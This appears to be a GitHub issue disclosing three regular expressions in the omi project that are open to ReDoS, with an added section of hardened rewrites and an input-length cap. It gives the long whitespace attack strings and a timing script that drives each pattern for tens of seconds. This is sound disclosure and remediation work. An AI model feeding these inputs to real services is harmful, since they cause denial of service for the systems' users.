
Vulnerable Regular Expressions in omi #571

Open
yetingli opened this issue Sep 14, 2020 · 0 comments

@yetingli

Type of Issue
Potential Regex Denial of Service (ReDoS)

Description
Here are three regular expressions with ReDoS vulnerabilities, as shown below.

  1. regex1 = /( +)[^:]+::/ location
    The ReDoS vulnerability of the regex is mainly due to the sub-pattern ( +)[^:]+ and can be exploited with the following string: " " * 5000
    It took 44.0 seconds for regex1 to match the malicious string.
  2. regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/ location
    The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s+[\s\S]*?\s+ and can be exploited with the following string: "OBTW" + " " * 5000
    It took 44.6 seconds for regex2 to match the malicious string.
  3. regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/ location1 location2
    The ReDoS vulnerability of the regex is mainly due to the sub-pattern [ \t]*(.+?)[ \t]* and can be exploited with the following string: "#" + " " * 5000
    It took 51.4 seconds for regex3 to match the malicious string.

I prepared a script that showcases the execution times of the vulnerable regexes as follows.

// Times regex.test() on a growing attack string built from `seed` plus spaces,
// printing the elapsed time every 100 characters. (The three blocks of the
// original script shared one implicit global and redeclared attack_str; they
// are folded into a single helper so the file also runs in strict mode.)
function measure(label, regex, seed) {
    let attack_str = seed;
    console.log(label + ": " + regex);
    for (let i = 1; i < 5000; i++) {
        attack_str = attack_str + " ";
        if (attack_str.length % 100 == 0) {
            const time = Date.now();
            regex.test(attack_str);
            const run_time = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + run_time + " ms");
        }
    }
}

// When attack_str.length=5000 , it took 44.0 seconds
measure("regex1", /( +)[^:]+::/, " ");

// When attack_str.length=5000 , it took 44.6 seconds
measure("regex2", /\bOBTW\s+[\s\S]*?\s+TLDR\b/, "OBTW");

// When attack_str.length=5000 , it took 51.4 seconds
measure("regex3", /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/, "#");

I am willing to suggest that you limit the input length, modify these regexes or replace these regexes with other code.
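The following is an added example, not code from omi or from the issue author. It puts the three reported patterns beside ambiguity-free rewrites, checks that the rewrites agree with the originals on a set of constructed samples, adds the input-length cap the report recommends, and times both versions on the report's attack strings. It assumes callers rely on match/no-match and the overall matched text: for regex1 the capture group shrinks from the whole run of spaces to a single space, and for regex3 a heading whose text is only whitespace no longer matches (the one behavioural change). The names `patterns`, `guardedExec`, `sameBehaviour`, `MAX_INPUT_LENGTH` and the sample strings are all constructed here.

```javascript
// Added example (not omi code). Original patterns from the report beside
// rewrites that remove the overlapping quantifiers each ReDoS depends on.
const patterns = {
  regex1: {
    original: /( +)[^:]+::/,
    // `( +)` and `[^:]+` both accept spaces, so a run of k spaces can be split
    // between them k ways. A single literal space removes that overlap; the
    // unanchored scan is still quadratic on an all-space input, hence the cap.
    hardened: / [^:]+::/,
    compareGroups: false, // group 1 deliberately shrinks to one space
  },
  regex2: {
    original: /\bOBTW\s+[\s\S]*?\s+TLDR\b/,
    // `[\s\S]*?` already absorbs any extra whitespace, so one `\s` on each side
    // accepts exactly the same strings without the two overlapping `\s+`.
    hardened: /\bOBTW\s[\s\S]*?\sTLDR\b/,
    compareGroups: true,
  },
  regex3: {
    original: /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/,
    // The heading text must start and end on a non-blank character, so the
    // `[ \t]*` runs around it can no longer trade characters with the text.
    // `??` keeps the original's shortest-text behaviour in front of trailing #.
    hardened: /^(#{1,6})[ \t]*([^ \t\n](?:[^\n]*?[^ \t\n])??)[ \t]*#*\n+/,
    compareGroups: true,
  },
};

// Assumed cap; set it to the largest input the application legitimately handles.
const MAX_INPUT_LENGTH = 10000;

// Runs the hardened pattern, refusing oversized input up front (defence in
// depth in case a rewrite still has a polynomial worst case).
function guardedExec(name, input, maxLength = MAX_INPUT_LENGTH) {
  if (input.length > maxLength) {
    throw new RangeError(`input of ${input.length} chars exceeds cap of ${maxLength}`);
  }
  return patterns[name].hardened.exec(input);
}

// True when original and hardened agree on every sample: same match/no-match,
// same overall match text and, when compareGroups is set, same capture groups.
function sameBehaviour(name, samples) {
  const { original, hardened, compareGroups } = patterns[name];
  return samples.every((s) => {
    const a = original.exec(s);
    const b = hardened.exec(s);
    if (a === null || b === null) return a === b;
    const n = compareGroups ? a.length : 1;
    for (let i = 0; i < n; i++) if (a[i] !== b[i]) return false;
    return true;
  });
}

// Wall-clock milliseconds for a single test() call.
function timeMs(re, input) {
  const start = Date.now();
  re.test(input);
  return Date.now() - start;
}

// Constructed samples covering the boundaries of each pattern.
const SAMPLES = {
  regex1: [" a::", "  ::", " ::", "x::", "a :b::", " std::string", "std::string", "a b:c::d"],
  regex2: ["OBTW  TLDR", "OBTW TLDR", "OBTW\ncomment\nTLDR", "OBTW comment TLDR!",
           "xOBTW  TLDR", "OBTW  TLDRx", "OBTW TLDR TLDR"],
  regex3: ["# Title\n", "##  Title ##\n", "###Title###\n\n", "# a # b\n", "#\n",
           "# Title", "####### seven\n", "#\tTabbed\t#\n", "# a#\n"],
};

// The attack strings from the report, parameterised by length.
const ATTACKS = {
  regex1: (n) => " ".repeat(n),
  regex2: (n) => "OBTW" + " ".repeat(n),
  regex3: (n) => "#" + " ".repeat(n),
};

for (const name of Object.keys(patterns)) {
  console.log(`${name}: agrees on samples = ${sameBehaviour(name, SAMPLES[name])}`);
  // The originals take tens of seconds at 5000 chars (see the report), so they
  // are timed at 1000 chars; the rewrites are timed at the report's 5000.
  console.log(`  original @1000: ${timeMs(patterns[name].original, ATTACKS[name](1000))} ms`);
  console.log(`  hardened @5000: ${timeMs(patterns[name].hardened, ATTACKS[name](5000))} ms`);
}
```

The sample check is the important half: a rewrite that is fast but accepts a different language is a regression, so every rewrite is compared against the original on inputs that sit on its boundaries (extra whitespace, missing word boundary, trailing hashes, seven hashes, no newline). The length cap is kept even though regex2 and regex3 are linear on the attack strings, because the regex1 rewrite is still quadratic when it has to scan many start positions.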
